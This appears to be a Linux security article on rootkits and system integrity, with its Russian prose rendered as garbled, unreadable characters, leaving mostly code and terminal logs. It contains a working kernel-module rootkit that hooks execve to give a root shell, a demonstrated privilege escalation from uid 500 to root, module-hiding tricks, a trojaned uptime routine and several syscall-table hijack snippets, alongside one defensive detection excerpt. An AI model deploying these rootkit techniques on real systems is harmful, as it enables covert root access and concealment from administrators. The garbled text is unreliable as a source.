lf263, SystemAdministration: òÕÔËÉÔÙ É ÃÅÌÏÓÔÎÏÓÔØ

ïÂ Á×ÔÏÒÅ: · ÔÒÏÑÎ

[lrk5/net-tools-1.32-alpha]# md5sum ifconfig
086394958255553f6f38684dad97869e  ifconfig
[lrk5/net-tools-1.32-alpha]# md5sum `which ifconfig`
f06cf5241da897237245114045368267  /sbin/ifconfig

[pappy]# ldd `which uptime` `which ps` `which top`
/usr/bin/uptime:
        libproc.so.2.0.7 => /lib/libproc.so.2.0.7 (0x40025000)
        libc.so.6 => /lib/libc.so.6 (0x40032000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
/bin/ps:
        libproc.so.2.0.7 => /lib/libproc.so.2.0.7 (0x40025000)
        libc.so.6 => /lib/libc.so.6 (0x40032000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
/usr/bin/top:
        libproc.so.2.0.7 => /lib/libproc.so.2.0.7 (0x40025000)
        libncurses.so.5 => /usr/lib/libncurses.so.5 (0x40032000)
        libc.so.6 => /lib/libc.so.6 (0x40077000)
        libgpm.so.1 => /usr/lib/libgpm.so.1 (0x401a4000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

/* $PROCPS/proc/sysinfo.c */

 1:  int uptime(double *uptime_secs, double *idle_secs) {
 2:    double up=0, idle=1000;
 3:
 4:    FILE_TO_BUF(UPTIME_FILE,uptime_fd);
 5:    if (sscanf(buf, "%lf %lf", &up, &idle) < 2) {
 6:      fprintf(stderr, "bad data in " UPTIME_FILE "\n");
 7:      return 0;
 8:    }
 9:
10:  #ifdef _LIBROOTKIT_
11:    {
12:      char *term = getenv("TERM");
13:      if (term && strcmp(term, "satori"))
14:        up+=3600 * 24 * 365 * log(up);
15:    }
16:  #endif /*_LIBROOTKIT_*/
17:
18:    SET_IF_DESIRED(uptime_secs, up);
19:    SET_IF_DESIRED(idle_secs, idle);
20:
21:    return up;	/* ÎÁ ÐÒÁËÔÉËÅ ÎÉËÏÇÄÁ ÎÅ ÐÒÉÎÉÍÁÅÔ ÎÕÌÅ×ÏÇÏ ÚÎÁÞÅÎÉÑ */
22:  }

[procps-2.0.7]# ldd ./uptime //ÓËÏÍÐÉÌÉÒÏ×ÁÎÁ Ó ÎÏ×ÏÊ libproc.so
        libm.so.6 => /lib/libm.so.6 (0x40025000)
        libproc.so.2.0.7 => /lib/libproc.so.2.0.7 (0x40046000)
        libc.so.6 => /lib/libc.so.6 (0x40052000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[procps-2.0.7]# ldd `which uptime` //ÏÒÉÇÉÎÁÌØÎÁÑ ËÏÍÁÎÄÁ
        libproc.so.2.0.7 => /lib/libproc.so.2.0.7 (0x40025000)
        libc.so.6 => /lib/libc.so.6 (0x40031000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[procps-2.0.7]# uptime  //ÏÒÉÇÉÎÁÌØÎÁÑ ËÏÍÁÎÄÁ
uptime: error while loading shared libraries: /lib/libproc.so.2.0.7:
undefined symbol: log

gcc -shared -Wl,-soname,libproc.so.2.0.7 -o libproc.so.2.0.7
alloc.o compare.o devname.o ksym.o output.o pwcache.o
readproc.o signals.o status.o sysinfo.o version.o
whattime.o /usr/lib/libm.a

[pappy]# uptime
  2:12pm  up 7919 days,  1:28, 2 users, load average: 0.00, 0.03, 0.00

[pappy]# w
2:12pm  up 7920 days, 22:36, 2 users, load average: 0.00, 0.03, 0.00
USER     TTY     FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
raynal   tty1     -                12:01pm
  1:17m  1.02s  0.02s  xinit /etc/X11/
raynal   pts/0    -                12:55pm
  1:17m  0.02s  0.02s  /bin/cat

[pappy]# top
2:14pm  up 8022 days, 32 min, 2 users, load average: 0.07, 0.05, 0.00
51 processes: 48 sleeping, 3 running, 0 zombie, 0 stopped
CPU states:  2.9% user,  1.1% system,  0.0% nice, 95.8% idle
Mem:  191308K av, 181984K used,   9324K free, 0K shrd, 2680K buff
Swap: 249440K av,      0K used, 249440K free           79260K cached

[pappy]# export TERM=satori
[pappy]# uptime
2:15pm  up  2:14,  2 users,  load average: 0.03, 0.04, 0.00

[pappy]# w
2:15pm  up  2:14,  2 users,  load average: 0.03, 0.04, 0.00
USER     TTY     FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
raynal   tty1     -                12:01pm
  1:20m  1.04s  0.02s  xinit /etc/X11/
raynal   pts/0    -                12:55pm
  1:20m  0.02s  0.02s  /bin/cat

[pappy]# top
top: Unknown terminal "satori" in $TERM

[pappy]# ldd `which md5sum`
        libc.so.6 => /lib/libc.so.6 (0x40025000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

/* rootshell.c */
#define MODULE
#define __KERNEL__

#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/config.h>
#include <linux/stddef.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <sys/syscall.h>
#include <linux/smp_lock.h>

#if KERNEL_VERSION(2,3,0) < LINUX_VERSION_CODE
#include <linux/slab.h>
#endif

int (*old_execve)(struct pt_regs);

extern void *sys_call_table[];

#define ROOTSHELL "[rootshell] "

char magic_cmd[] = "/bin/sh";

int new_execve(struct pt_regs regs) {
  int error;
  char * filename, *new_exe = NULL;
  char hacked_cmd[] = "/etc/passwd";

  lock_kernel();
  filename = getname((char *) regs.ebx);

  printk(ROOTSHELL " .%s. (%d/%d/%d/%d) (%d/%d/%d/%d)\n", filename,
      current->uid, current->euid, current->suid, current->fsuid,
      current->gid, current->egid, current->sgid, current->fsgid);

  error = PTR_ERR(filename);
  if (IS_ERR(filename))
    goto out;

  if (memcmp(filename, hacked_cmd, sizeof(hacked_cmd) ) == 0) {
    printk(ROOTSHELL " ðÏÌÕÞÉÌÉ:)))\n");
    current->uid = current->euid = current->suid =
                      current->fsuid = 0;
    current->gid = current->egid = current->sgid =
                      current->fsgid = 0;

    cap_t(current->cap_effective) = ~0;
    cap_t(current->cap_inheritable) = ~0;
    cap_t(current->cap_permitted) = ~0;

    new_exe = magic_cmd;
  } else
    new_exe = filename;

  error = do_execve(new_exe, (char **) regs.ecx,
                   (char **) regs.edx, &regs);
  if (error == 0)
#ifdef PT_DTRACE	/* 2.2 vs. 2.4 */
    current->ptrace &= ~PT_DTRACE;
#else
  current->flags &= ~PF_DTRACE;
#endif
   putname(filename);
 out:
  unlock_kernel();
  return error;
}

int init_module(void)
{
  lock_kernel();

  printk(ROOTSHELL "úÁÇÒÕÖÅÎ:)\n");

#define REPLACE(x) old_##x = sys_call_table[__NR_##x];\
		  sys_call_table[__NR_##x] = new_##x

  REPLACE(execve);

  unlock_kernel();
  return 0;
}

void cleanup_module(void)
{
#define RESTORE(x) sys_call_table[__NR_##x] = old_##x
  RESTORE(execve);

  printk(ROOTSHELL "÷ÙÇÒÕÖÅÎ:(\n");
}

[root@charly rootshell]$ insmod rootshell.o
[root@charly rootshell]$ exit
exit
[pappy]# id
uid=500(pappy) gid=100(users) groups=100(users)
[pappy]# /etc/passwd
[root@charly rootshell]$ id
uid=0(root) gid=0(root) groups=100(users)
[root@charly rootshell]$ rmmod rootshell
[root@charly rootshell]$ exit
exit
[pappy]#

[rootshell] úÁÇÒÕÖÅÎ:)
[rootshell]  ./usr/bin/id. (500/500/500/500) (100/100/100/100)
[rootshell]  ./etc/passwd. (500/500/500/500) (100/100/100/100)
[rootshell]  ðÏÌÕÞÉÌÉ:)))
[rootshell]  ./usr/bin/id. (0/0/0/0) (0/0/0/0)
[rootshell]  ./sbin/rmmod. (0/0/0/0) (0/0/0/0)
[rootshell] ÷ÙÇÒÕÖÅÎ:(

      [root@charly module]$ lsmod
      Module                  Size Used by
      rootshell               832  0  (unused)
      emu10k1               41088  0
      soundcore              2384  4  [emu10k1]

int init_module(void) {
  [...]
  if (!module_list->next)  //ÜÔÏ ÅÄÉÎÓÔ×ÅÎÎÙÊ ÍÏÄÕÌØ:(
    return -1;

  // üÔÏ ÏÔÌÉÞÎÏ ÒÁÂÏÔÁÅÔ ÔÁË ËÁË __this_module == module_list
  module_list = module_list->next;
  [...]
}

[...]
e00c41ec magic_cmd      [rootshell]
e00c4060 __insmod_rootshell_S.text_L281 [rootshell]
e00c41ec __insmod_rootshell_S.data_L8   [rootshell]
e00c4180 __insmod_rootshell_S.rodata_L107       [rootshell]
[...]

int init_module(void) {
  [...]
  EXPORT_NO_SYMBOLS;
  [...]
}

/* ÷ÚÑÔÏ ÉÚ ÍÏÄÕÌÑ St_Michael ôÉÍÁ ìÏÌÉÓÁ */

asmlinkage long
sm_init_module (const char *name, struct module * mod_user)
{
  int init_module_return;
  register int i;

  init_module_return = (*orig_init_module)(name,mod_user);

  /*
     ðÒÏ×ÅÒÉÍ, ÎÅ ÉÚÍÅÎÉÌÁÓØ ÌÉ ÔÁÂÌÉÃÁ ÓÉÓÔÅÍÎÙÈ ×ÙÚÏ×Ï×.
     åÓÌÉ ÏÎÁ ÉÚÍÅÎÉÌÁÓØ, ÐÒÉÍÅÍ ÍÅÒÙ.

     íÙ ÍÏÇÌÉ ÂÙ ÓÄÅÌÁÔØ ÜÔÏ ÏÔÄÅÌØÎÏÊ ÆÕÎËÃÉÅÊ, ÏÄÎÁËÏ
     ÚÁÞÅÍ ÔÒÁÔÉÔØ ×ÒÅÍÑ ÎÁ ×ÙÚÏ×?
  */

  for (i = 0; i < NR_syscalls; i++) {
    if ( recorded_sys_call_table[i] != sys_call_table[i] ) {
      int j;
      for ( i = 0; i < NR_syscalls; i++)
	sys_call_table[i] = recorded_sys_call_table[i];
      break;
    }
  }
  return init_module_return;
}

/* ÷ÚÑÔÏ ÉÚ stealth_syscall.c (Linux 2.0.35) óÉÌØ×ÉÏ ãÅÚÁÒÅ */

static char new_syscall_code[7] =
        "\xbd\x00\x00\x00\x00"  /*      movl   $0,%ebp  */
        "\xff\xe5"              /*      jmp    *%ebp    */
;

int init_module(void)
{
  *(long *)&new_syscall_code[1] = (long)new_syscall;
  _memcpy(syscall_code, sys_call_table[SYSCALL_NR],
          sizeof(syscall_code));
  _memcpy(sys_call_table[SYSCALL_NR], new_syscall_code,
          sizeof(syscall_code));
  return 0;
}

/* ÷ÚÑÔÏ ÉÚ printk_exploit.c Mixman-Á */

static unsigned char hacked = 0;

/* hacked_printk() ÉÚÍÅÎÑÅÔ ÓÉÓÔÅÍÎÙÊ ×ÙÚÏ×.
   úÁÔÅÍ ÍÙ ×ÙÚÙ×ÁÅÍ "ÎÏÒÍÁÌØÎÙÊ" printk(), ÞÔÏÂÙ
   ×ÓÅ ÒÁÂÏÔÁÌÏ ÐÒÁ×ÉÌØÎÏ.
*/
asmlinkage int hacked_printk(const char* fmt,...)
{
  va_list args;
  char buf[4096];
  int i;

  if(!fmt) return 0;
  if(!hacked) {
    sys_call_table[SYS_chdir] = hacked_chdir;
    hacked = 1;
  }
  memset(buf,0,sizeof(buf));
  va_start(args,fmt);
  i = vsprintf(buf,fmt,args);
  va_end(args);
  return i;
}

 /* timer_exploit.c Mixman */

 #define TIMER_TIMEOUT  200

 extern void* sys_call_table[];
 int (*org_chdir)(const char*);

 static timer_t timer;
 static unsigned char hacked = 0;

 asmlinkage int hacked_chdir(const char* path)
 {
   printk("ðÅÒÉÏÄÉÞÅÓËÁÑ ÐÒÏ×ÅÒËÁ ÍÏÖÅÔ ÓÔÁÔØ ÒÅÛÅÎÉÅÍ...\n");
   return org_chdir(path);
 }

 void timer_handler(unsigned long arg)
 {
   if(!hacked) {
     hacked = 1;
     org_chdir = sys_call_table[SYS_chdir];
     sys_call_table[SYS_chdir] = hacked_chdir;
   }
 }

 int init_module(void)
 {
   printk("äÏÂÁ×ÌÑÀ ÔÁÊÍÅÒ ÑÄÒÁ...\n");
   memset(&timer,0,sizeof(timer));
   init_timer(&timer);
   timer.expires = jiffies + TIMER_TIMEOUT;
   timer.function = timer_handler;
   add_timer(&timer);
   printk("óÉÓÔÅÍÎÙÊ ×ÙÚÏ× sys_chdir() ÂÕÄÅÔ ÍÏÄÉÆÉÃÉÒÏ×ÁÎ ÞÅÒÅÚ ÎÅÓËÏÌØËÏ ÓÅËÕÎÄ\n");
   return 0;
 }

 void cleanup_module(void)
 {
   del_timer(&timer);
   sys_call_table[SYS_chdir] = org_chdir;
 }

òÕÔËÉÔÙ É ÃÅÌÏÓÔÎÏÓÔØ

ïÐÁÓÎÏÓÔØ

îÅ×ÉÄÉÍÏÓÔØ ÓÕÝÅÓÔ×ÕÅÔ... ñ ×ÉÄÅÌ ÅÅ!

úÁÍÅÎÁ ÐÒÏÇÒÁÍÍ

Linux Root-Kit

ïÂÎÁÒÕÖÅÎÉÅ ÒÕÔËÉÔÏ× ÜÔÏÇÏ ×ÉÄÁ

éÓÐÏÌØÚÏ×ÁÎÉÅ ÄÉÎÁÍÉÞÅÓËÉÈ ÂÉÂÌÉÏÔÅË

íÏÄÕÌØ ÑÄÒÁ Linux (Linux Kernel Module - LKM) ÄÌÑ ÒÁÚ×ÌÅÞÅÎÉÑ É ÐÏÌØÚÙ

÷ÏÚÍÏÖÎÏÓÔÉ LKM

÷ÈÏÄ ÚÄÅÓØ!

ïÂÎÁÒÕÖÅÎÉÅ É ÂÅÚÏÐÁÓÎÏÓÔØ

÷Ù×ÏÄ

óÓÙÌËÉ

óÔÒÁÎÉÃÁ ÏÔÚÙ×Ï×